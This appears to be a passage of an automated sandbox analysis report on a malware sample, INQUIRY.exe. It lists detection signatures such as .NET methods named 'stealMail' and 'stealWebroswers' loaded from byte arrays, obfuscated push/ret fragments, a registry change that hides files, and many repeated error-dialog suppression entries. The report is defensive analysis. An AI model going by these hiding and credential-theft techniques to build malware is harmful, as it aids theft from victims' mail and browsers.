                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 0_2_004414DC
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00441B28 push 00441BB5h; ret 0_2_00441BAD
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C020 push 0040C098h; ret 0_2_0040C090
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00430030 push 0043005Ch; ret 0_2_00430054
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C09A push 0040C10Bh; ret 0_2_0040C103
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C09C push 0040C10Bh; ret 0_2_0040C103
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C17A push 0040C1A8h; ret 0_2_0040C1A0
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C17C push 0040C1A8h; ret 0_2_0040C1A0
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00430198 push 004301C4h; ret 0_2_004301BC
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004101B0 push 00410211h; ret 0_2_00410209
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00410214 push 00410415h; ret 0_2_0041040D
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C2A4 push eax; retn 0040h 0_2_0040C2B9
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004583D8 push 00458404h; ret 0_2_004583FC
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00410418 push 0041055Ch; ret 0_2_00410554
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00426524 push 004265F4h; ret 0_2_004265EC
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00410530 push 0041055Ch; ret 0_2_00410554
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0046A5E4 push ecx; mov dword ptr [esp], ecx 0_2_0046A5E8
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040659E push 004065F1h; ret 0_2_004065E9
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004065A0 push 004065F1h; ret 0_2_004065E9
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0041C6E4 push ecx; mov dword ptr [esp], edx 0_2_0041C6E9
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00406770 push 0040679Ch; ret 0_2_00406794
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00426704 push 00426730h; ret 0_2_00426728
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004667D8 push 00466804h; ret 0_2_004667FC
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004627D8 push ecx; mov dword ptr [esp], ecx 0_2_004627DD
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040682C push 00406858h; ret 0_2_00406850
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0046A8F4 push 0046A91Ah; ret 0_2_0046A912
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0046A958 push 0046A984h; ret 0_2_0046A97C
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0041A978 push ecx; mov dword ptr [esp], edx 0_2_0041A97A
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004269BC push 004269E8h; ret 0_2_004269E0
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00428A50 push 00428A7Ch; ret 0_2_00428A74
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00444A7C push 00444AA8h; ret 0_2_00444AA0
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00428A04 push 00428A45h; ret 0_2_00428A3D
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A04 push 00428A45h; ret 0_2_00428A3D

                    Hooking and other Techniques for Hiding and Protection:

                    Changes the view of files in windows explorer (hidden files and folders)
                    Source: C:\Users\user\Desktop\INQUIRY.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0043BDB0 IsIconic,GetCapture
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0043BDB0 IsIconic,GetCapture
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode
                    Source: C:\Users\user\Desktop\INQUIRY.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information set: NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information set: NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
